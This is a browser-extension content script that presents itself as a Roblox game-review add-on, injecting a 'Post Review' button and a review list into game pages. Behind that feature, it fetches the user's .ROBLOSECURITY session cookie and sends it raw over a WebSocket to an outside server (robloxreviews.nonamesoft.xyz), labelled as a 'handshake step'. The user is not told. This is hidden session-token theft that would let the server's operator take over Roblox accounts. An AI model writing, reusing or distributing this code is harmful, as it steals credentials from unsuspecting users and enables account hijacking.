chrome.runtime.sendMessage({ type: "GetCookie", message: ".ROBLOSECURITY" }, (response) => {
    if (response && response.cookie) {
        let roblosecurity = response.cookie;
        let pagana = true;

        async function digestMessage(message) {
            const msgUint8 = new TextEncoder().encode(message); // encode as (utf-8) Uint8Array
            const hashBuffer = await window.crypto.subtle.digest("SHA-256", msgUint8); // hash the message
            const hashArray = Array.from(new Uint8Array(hashBuffer)); // convert buffer to byte array
            const hashHex = hashArray
                .map((b) => b.toString(16).padStart(2, "0"))
                .join(""); // convert bytes to hex string
            return hashHex;
        }

        function main() {
            if (pagana) {
                window.setTimeout(main, 2000);
                pagana = false;
                return;
            }

            console.log("Wait complete. 👀");

            const socket = new WebSocket("wss://robloxreviews.nonamesoft.xyz/?");
            let latestMessage = null;
            let ignore = false;

            socket.onmessage = function (msg) {
                if (!ignore) {
                    latestMessage = msg.data;
                    console.log(msg.data);
                } else {
                    ignore = false;
                }
            };

            socket.onclose = function () {
                console.log("Disconnected... 😢");
            };

            latestMessage = null;
            const gameID = window.location.href.split("/")[4];
            let mode = "Disconnected";
            let alreadyHadAck = false;
            let hasInjected = false;

            function die() {
                if (!hasInjected) {
                    console.log("Injecting... 💉");
                    const toInjectTo = document.getElementById("game-detail-page");
const toInject = document.createElement("div");
toInjectTo.appendChild(document.createElement("br"));
toInjectTo.appendChild(document.createElement("br"));
toInject.innerHTML = `<div class="section-content" style="position:static;padding:50px;z-index: -1;">
                                                <button id="poastRewButton" class="btn-common-play-game-lg btn-primary-md btn-full-width">Post Review</button>
                                                <br><br>
                                                <div id="rev-reviews"></div>
                                            </div>`;
                    if (toInjectTo) {
                        toInjectTo.appendChild(toInject);
                        hasInjected = true;
                        console.log("Injected! 💉");
                        document.getElementById("poastRewButton").onclick = function()

{
socket.send(JSON.stringify({ command: "AddReviewsForGame", args: [gameID,prompt("Review text:"),(prompt("Do you recommend this game? Yes or no.").toLowerCase() === 'yes')] }));
}
                        latestMessage = null;
                        socket.send(JSON.stringify({ command: "GetReviewsForGame", args: [gameID] }));
                    } else {
                        console.error("Element 'game-detail-page' not found.");
                    }
                }

                if (latestMessage === null) {
                    window.setTimeout(die, 100); // Check the flag every 100ms
                } else {
                    console.log("Loading data...");
                    try {
                        const reviews = JSON.parse(latestMessage);
                        latestMessage = null;

                        reviews.forEach((data) => {
                            const container = document.createElement("div");
                            const user = document.createElement("h3");
                            fetch("https://users.roblox.com/v1/users/".concat(data.RobloxOwnerID.toString()), {
    method: "GET",
    credentials: "include"
  })
                                .then(res => res.json())
                                .then(d => {
                                    user.innerText = `${d.displayName}:`;
                                });

                            const content = document.createElement("p");
                            content.innerText = data.content;

                            const rec = document.createElement("h4");
                            rec.innerText = `Do I recommend this? ${data.recommendsGame ? "Yes" : "No"}`;

                            container.appendChild(user);
                            container.appendChild(content);
                            container.appendChild(rec);

                            document.getElementById("rev-reviews").appendChild(container);
                        });
                    } catch (err) {
                        console.error("Error parsing reviews:", err);
                        window.setTimeout(die, 10);
                    }
                }
            }

            function checkFlag3() {
                if (latestMessage === null) {
                    window.setTimeout(checkFlag3, 100); // Check the flag every 100ms
                } else {
                    if (!alreadyHadAck) {
                        alreadyHadAck = true;
                        console.log("Server:", latestMessage);
                        latestMessage = null;
                        window.setTimeout(checkFlag3, 100);
                        return;
                    }

                    const handshake = JSON.parse(latestMessage);
                    mode = handshake.handshake;
                    console.log("Server:", latestMessage);
                    latestMessage = null;
                    console.log("WE'RE CONNECTED! 🔥🔥🔥");
                    setTimeout(die, 100);
                }
            }

            function checkFlag2() {
                if (latestMessage === null) {
                    window.setTimeout(checkFlag2, 100); // Check the flag every 100ms
                } else {
                    console.log("Server:", latestMessage);
                    latestMessage = null;
                    fetch("https://users.roblox.com/v1/users/authenticated", {
    method: "GET",
    credentials: "include"
  })
                        .then(res => res.text())
                        .then(d => {
                            digestMessage(d).then((digestHex) => {
                                socket.send(digestHex); // Handshake step 3
                                checkFlag3();
                            });
                        });
                }
            }

            function checkFlag() {
                if (latestMessage === null) {
                    window.setTimeout(checkFlag, 100); // Check the flag every 100ms
                } else {
                    console.log("Server:", latestMessage);
                    latestMessage = null;
                    socket.send(roblosecurity); // Handshake step 2
                    checkFlag2();
                }
            }

            console.log("WebSocket Handshake in Progress... 🚪👋");

            socket.onopen = function () {
                socket.send("Connect"); // Handshake step 1
                checkFlag();
            };
        }

        console.log("Waiting for site to load.. ⏳🙄");

        main();
    } else {
        console.error("Failed to retrieve .ROBLOSECURITY cookie.");
    }
});
